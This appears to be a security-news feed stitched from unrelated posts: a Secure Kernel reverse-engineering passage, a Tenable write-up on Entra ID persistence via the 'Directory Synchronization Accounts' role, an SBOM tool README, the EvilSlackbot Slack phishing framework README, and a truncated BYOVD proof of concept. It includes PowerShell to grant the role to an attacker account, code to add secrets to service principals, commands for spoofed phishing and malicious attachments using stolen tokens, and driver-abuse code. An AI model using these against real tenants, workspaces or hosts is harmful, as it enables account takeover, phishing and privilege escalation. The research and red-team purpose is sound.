Additionally, we saw previously that if the relocation information was stripped out of the image, the booleans at offsets 0x50 and 0x58 of the Secure Image object were set to false and true (0 and 1), respectively. If, however, the relocation information wasn't stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these booleans are instead set to true and false (1 and 0). In either case, the pair tells the Secure Image object why relocation information may or may not be present.
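The two bookkeeping cases can be sketched as a small decision function. This is a model of the behavior described above, not decompiled code; the tuple positions stand in for the booleans at offsets 0x50 and 0x58, and IMAGE_FILE_RELOCS_STRIPPED (0x0001) is the standard PE flag:

```python
IMAGE_FILE_RELOCS_STRIPPED = 0x0001  # PE/COFF Characteristics flag

def classify_relocations(characteristics: int, reloc_dir_rva: int, reloc_dir_size: int):
    """Return the pair of booleans as the Secure Image object appears to
    record them at offsets (0x50, 0x58)."""
    if characteristics & IMAGE_FILE_RELOCS_STRIPPED:
        return (False, True)   # stripped at link time: (0x50, 0x58) = (0, 1)
    if reloc_dir_rva == 0 or reloc_dir_size == 0:
        return (True, False)   # not stripped, but no relocation directory: (1, 0)
    return (False, False)      # relocation data is present and usable
```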

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image, or is the number of data directories at least 10 (decimal), enough to support the data directory we want to capture? If not, skip step 2.
  2. If the above is true, allocate and fill out the “Dynamic Relocation Data”.
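Interpreted against the PE format, that gate makes sense: the load configuration entry is data directory index 10 (IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG), so the directory array must extend past that index before the entry can be read. A hedged sketch of the check (this sketch uses a strict comparison, since an array of exactly 10 entries ends at index 9; the exact comparison in securekernel.exe may differ):

```python
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10  # index of the load config data directory

def can_capture_dynamic_reloc_data(is_64bit: bool, number_of_rva_and_sizes: int) -> bool:
    # 64-bit images always qualify; otherwise the OptionalHeader must declare
    # enough data directories for index 10 to exist.
    return is_64bit or number_of_rva_and_sizes > IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
```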

As a side note, I only determined that the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage, which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (we will talk about this routine in more detail shortly). In the securekernel!SkmiDeleteImage logic, a few pointers in the object are checked to see if they are allocated and, if so, freed (this makes sense, as we have seen many more memory allocations than just the object itself). One of these is the allocation at SecureImageObject + 0xB8; if it is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The load config data is verified, and its virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table lives in the load config directory of an executable.

This is the last information the Secure Image object needs for initialization (we know more information will be collected after this Secure System Call returns)! The one parameter of securekernel!SkmmCreateSecureImageSection we haven’t touched yet is the last one, which is actually an output parameter. It is filled with the result of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter is stored in the original Secure System Call arguments at offset 0x10 (16 decimal).

This handle is also stored in the Secure Image object itself. This also implies that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area of the section object which backs the image (in VTL 0) itself, specifically in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that this isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is worth noting here. As another point of note, the way I knew this handle would eventually be stored there is that when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will save that analysis for another blog post, in which we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation, before the image is actually fully loaded into VTL 0. Before we close this post, it is worth taking a look at the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code at the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if it was created but a failure occurred while setting it up. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. Historically on Windows, the reference count for an object is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20-byte header! Taking a look at securekernel!SkobpDereferenceObject, we can clearly see that within this header the reference count is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.
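Putting those observations together, the dereference path can be modeled like this (a behavioral sketch of what was described above, not a reimplementation of securekernel!SkobpDereferenceObject; the header layout is inferred from the 0x20-byte offset and the refcount at +0x18):

```python
class SkObjectHeader:
    """Models the 0x20-byte header that precedes every Secure Kernel object:
    a destructor pointer plus a reference count (observed at offset 0x18)."""
    def __init__(self, destructor):
        self.refcount = 1
        self.destructor = destructor

def skob_dereference(header, body):
    """Drop one reference; run the type's destructor when the count hits zero
    (e.g. securekernel!SkmiDeleteImage for Secure Image objects)."""
    header.refcount -= 1
    if header.refcount == 0 and header.destructor:
        header.destructor(body)

freed = []
hdr = SkObjectHeader(destructor=lambda obj: freed.append(obj))
skob_dereference(hdr, "secure-image-object")
print(freed)  # ['secure-image-object']
```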

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following is a list of most of the valid object types I located in the Secure Kernel (although without further analysis it is unclear what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure Hal Extension Object (securekernel!SkhalExtensionType)
  6. Secure Allocation Object (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Object (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Object (securekernel!SkmiSectionType)
  10. Secure Process Object (securekernel!SkpsProcessType)
  11. Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Honestly, at the very end of the analysis I did for this blog, I stumbled across some wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (the Federal Information Processing Standard) and contain some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found this blog to be, at the very least, not boring, even if it wasn’t new information to you. As always, if you have feedback, please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in this post are completely mine). If there are issues identified, please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the Directory Synchronization Accounts role among the roughly 100 built-in Entra roles. This role has the ID “d29b2b05-8046-44ba-8758-1e26182fcf32”, it carries the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect since it can be assigned technically, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants the Entra service user the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their passwords in Entra when they change in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID that activates multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa (@DrAzureAD), assignees of the “Directory Synchronization Accounts” role are excluded from security defaults!

Dr. Nestori Syynimaa on Twitter: "Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE / Twitter"


Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this, since the legitimate accounts are user accounts and thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account, which apparently has 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose the portal is running a different version of the code, or a feature flag or A/B test is involved, because this one uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role there, shouldn’t we? Well, as you guessed, it’s hidden too 🙈 (in all my tenants; no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • Only if Password Hash Sync (PHS) is enabled, but the role allows enabling it
  • Only via the private “Azure AD Synchronization” API, implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc. It must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API. The reset must therefore be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • Not exploitable if the target has MFA or FIDO2 authentication enforced, since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article, but in summary, the idea is to identify an application or service principal holding powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. This allows authenticating as the service principal and abusing the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.
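Concretely, the credential can be added via the Microsoft Graph addPassword action on the target service principal. A sketch of the request an attacker holding the role could build (the service principal ID and displayName are placeholders; authentication and error handling are omitted):

```python
import json

GRAPH = "https://graph.microsoft.com/v1.0"

def build_add_password_request(service_principal_id: str):
    """Build the Microsoft Graph addPassword call that attaches a new
    client secret to a service principal."""
    url = f"{GRAPH}/servicePrincipals/{service_principal_id}/addPassword"
    # Hypothetical, innocuous-looking credential name chosen by the attacker.
    body = {"passwordCredential": {"displayName": "sync-maintenance"}}
    return url, json.dumps(body)

url, body = build_add_password_request("00000000-0000-0000-0000-000000000000")
print(url)
# Send with an Authorization: Bearer <token> header; Graph returns the
# generated secretText, which can then be used to authenticate as the
# service principal.
```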

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since this role cannot be managed from the Azure portal or Entra admin center, how can its assignees be listed or managed? We will see how using the Microsoft Graph PowerShell SDK, since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command lists the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (seen at the beginning) instead of its name, for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals”, which can be users, groups, or service principals (undocumented 😉), i.e. different types of objects.

In this example, I specified the “Domain.Read.All” Graph API permission when connecting because it is usually already delegated, but the least-privileged permission is actually “RoleManagement.Read.Directory”.
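For readers who prefer raw Microsoft Graph calls over the PowerShell SDK, the same lookup is two GET requests: resolve the activated role instance from its well-known template ID, then enumerate its members. A sketch of the request construction only (authentication omitted):

```python
GRAPH = "https://graph.microsoft.com/v1.0"
DIRSYNC_TEMPLATE_ID = "d29b2b05-8046-44ba-8758-1e26182fcf32"

def role_lookup_url() -> str:
    # Resolve the activated directoryRole instance from its template ID.
    return (f"{GRAPH}/directoryRoles"
            f"?$filter=roleTemplateId eq '{DIRSYNC_TEMPLATE_ID}'")

def members_url(role_object_id: str) -> str:
    # Members may be users, groups, or service principals.
    return f"{GRAPH}/directoryRoles/{role_object_id}/members"

print(role_lookup_url())
# Issue both GETs with an Authorization: Bearer <token> header holding
# at least the RoleManagement.Read.Directory permission.
```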

Add role assignment

And how would an attacker wishing to abuse this role for stealthy persistence assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example, if Entra Connect / Entra Cloud Sync was never configured), the role instance must first be created from the role template, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see them, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able to list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution with a better user experience that discourages use of the “Directory Synchronization Accounts” role without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.


Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions


This is a simple SBOM utility which aims to provide an insider view of which packages are actually being executed.

The process and objective are simple: get a clear view of the packages installed by APT (support for RPM and other package managers is in progress) and check which of those packages are actually being executed.
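For context on what a static APT scan works against: on Debian-based systems the installed-package database lives in /var/lib/dpkg/status, a stanza-per-package text file. A minimal, tool-independent sketch of extracting package/version pairs from it (an illustration, not Startup-SBOM's actual code):

```python
def parse_dpkg_status(text: str) -> dict:
    """Parse dpkg 'status'-style stanzas into {package: version}."""
    packages, name, version = {}, None, None
    for line in text.splitlines():
        if line.startswith("Package: "):
            name = line.split(": ", 1)[1]
        elif line.startswith("Version: "):
            version = line.split(": ", 1)[1]
        elif line == "" and name:          # a blank line ends a stanza
            packages[name] = version
            name = version = None
    if name:                               # final stanza without trailing blank
        packages[name] = version
    return packages

sample = "Package: bash\nVersion: 5.1-2\n\nPackage: curl\nVersion: 7.88.1\n"
print(parse_dpkg_status(sample))  # {'bash': '5.1-2', 'curl': '7.88.1'}
```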


Installation

The packages needed are mentioned in the requirements.txt file and can be installed using pip:

pip3 install -r requirements.txt

Usage

  • First of all install the packages.
  • Secondly, you need to set up the environment:
    • Mount the image: currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it's still quite a task for me.
  • Finally run the tool to list all the packages.
| Argument | Description |
| --- | --- |
| `--analysis-mode` | Specifies the mode of operation. Default is `static`. Choices are `static` and `chroot`. |
| `--static-type` | Specifies the type of analysis for static mode. Required for static mode only. Choices are `info` and `service`. |
| `--volume-path` | Specifies the path to the mounted volume. Default is `/mnt`. |
| `--save-file` | Specifies the output file for JSON output. |
| `--info-graphic` | Specifies whether to generate visual plots for chroot analysis. Default is `True`. |
| `--pkg-mgr` | Manually specify the package manager, or omit this option for automatic detection. |
APT:

  • Static Info Analysis:
    • This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
    • It analyzes the packages installed on the mounted volume located at /mnt.
    • It saves the output in a JSON file named output.json.
    • It generates visual plots for CHROOT analysis.

```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
  • Static Service Analysis:
    • This command runs the program in static analysis mode, specifically using the Service file analysis method.
    • It analyzes the packages installed on the mounted volume located at /custom_mount.
    • It saves the output in a JSON file named output.json.
    • It does not generate visual plots for CHROOT analysis.

```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
```

  • Chroot analysis with or without graphic output:
    • This command runs the program in chroot analysis mode.
    • It analyzes the packages installed on the mounted volume located at /mnt.
    • It saves the output in a JSON file named output.json.
    • For graphical output keep --info-graphic as True, else False.

```bash
python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```

RPM:

  • Static Analysis:
    • Similar to how it's done on APT, but only one type of static scan is available for now.

```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```

  • Chroot analysis with or without graphic output:
    • Exactly how it's done on APT.

```bash
python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```

Supporting Images

Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect yet.

I am working on the Pacman side of things; I am trying to find a reliable way of accessing the Pacman db for static analysis.

Graphical Output Images (Chroot)

APT Chroot

RPM Chroot

Inner Workings

For the workings and process related documentation please read the wiki page: Link

TODO

  • [x] Support for RPM
  • [x] Support for APT
  • [x] Support for Chroot Analysis
  • [x] Support for Versions
  • [x] Support for Chroot Graphical output
  • [x] Support for organized graphical output
  • [ ] Support for Pacman

Ideas and Discussions

Ideas regarding this topic are welcome in the discussions page.



Yesterday — 2 June 2024

EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot may request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
-h, --help show this help message and exit

Required:
-t TOKEN, --token TOKEN
Slack Oauth token

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
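Under the hood, a spoofed message is a chat.postMessage call in which the chat:write.customize scope lets the caller override the displayed sender name and icon. A sketch of the payload such a call needs (field names per the Slack Web API; resolving the target's user or channel ID, e.g. via users.lookupByEmail, is assumed to have happened already, and the example values are placeholders):

```python
def build_spoofed_message(channel_id: str, text: str,
                          fake_name: str, fake_icon_url: str) -> dict:
    """Payload for Slack's chat.postMessage; the username/icon_url overrides
    take effect only when the token has the chat:write.customize scope."""
    return {
        "channel": channel_id,       # user or channel ID resolved beforehand
        "text": text,
        "username": fake_name,       # display name shown instead of the bot's
        "icon_url": fake_icon_url,   # avatar shown instead of the bot's
    }

payload = build_spoofed_message("U0123ABC", "Please re-authenticate: https://example.com",
                                "IT Helpdesk", "https://example.com/it.png")
print(payload["username"])  # IT Helpdesk
```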

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
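Attachment delivery likely rides on Slack's legacy `files.upload` endpoint, which accepts inline text via a `content` field (binary files go as multipart form data, and newer Slack apps must use the `files.getUploadURLExternal` / `files.completeUploadExternal` pair instead). A hedged sketch of the payload such a call would carry, not the tool's actual implementation:

```python
def build_text_upload(channel_id: str, filename: str, content: str) -> dict:
    # Legacy files.upload payload: "channels" is a comma-separated list of
    # channel or DM IDs to share the file into, and "content" carries the
    # file body for text uploads.
    return {
        "channels": channel_id,
        "filename": filename,
        "content": content,
    }
```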

Arguments

Arguments:
  -f FILE, --file FILE                      Path to file attachment
  -e EMAIL, --email EMAIL                   Email of target
  -cH CHANNEL, --channel CHANNEL            Target Slack channel (do not include #)
  -eL EMAIL_LIST, --email_list EMAIL_LIST   Path to list of emails separated by newlines
  -c, --check                               Look up and display the permissions and available attacks associated with your provided token
  -o OUTFILE, --outfile OUTFILE             Outfile to store search results
  -cL, --channel_list                       List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can enumerate and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL
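Channel enumeration presumably relies on Slack's `conversations.list` method, which returns public channels in pages linked by a `next_cursor` value. The pagination logic can be sketched independently of HTTP; `fetch_page` below stands in for an authenticated API call and is an illustrative assumption, not EvilSlackbot's actual code.

```python
def list_public_channels(fetch_page):
    """Collect all public channels by following Slack's cursor pagination.

    `fetch_page` is any callable that takes a cursor string and returns a
    conversations.list-style response dict; in the real tool it would wrap
    an authenticated HTTP request with types=public_channel.
    """
    channels, cursor = [], ""
    while True:
        page = fetch_page(cursor)
        channels.extend(page.get("channels", []))
        # An empty next_cursor marks the final page.
        cursor = page.get("response_metadata", {}).get("next_cursor", "")
        if not cursor:
            return channels
```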



Reaper - Proof Of Concept On BYOVD Attack


Reaper is a proof of concept demonstrating a BYOVD (Bring Your Own Vulnerable Driver) attack. This technique involves loading a legitimate but vulnerable driver onto a target system, then abusing that driver to perform malicious actions from kernel context.

Reaper specifically exploits the vulnerability present in version 2.8.0.0 of the kprocesshacker.sys driver, taking advantage of its weaknesses to gain privileged access to and control over processes on the target system.

Note: Reaper does not kill the Windows Defender process, since that process is protected; Reaper is a simple proof of concept.
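The general BYOVD pattern is: load the signed-but-vulnerable driver, open the device object it registers, and send it an IOCTL asking it to act on an arbitrary process from kernel mode. The sketch below illustrates that pattern via ctypes; the IOCTL function number (0x801) and device path (`\\.\KProcessHacker2`) are assumptions for illustration, not the driver's real values, and the call only works on a Windows machine with the driver loaded.

```python
import ctypes
import sys


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    # Python port of the Windows CTL_CODE macro, which packs the four
    # fields of the IOCTL number that user mode passes to DeviceIoControl.
    return (device_type << 16) | (access << 14) | (function << 2) | method


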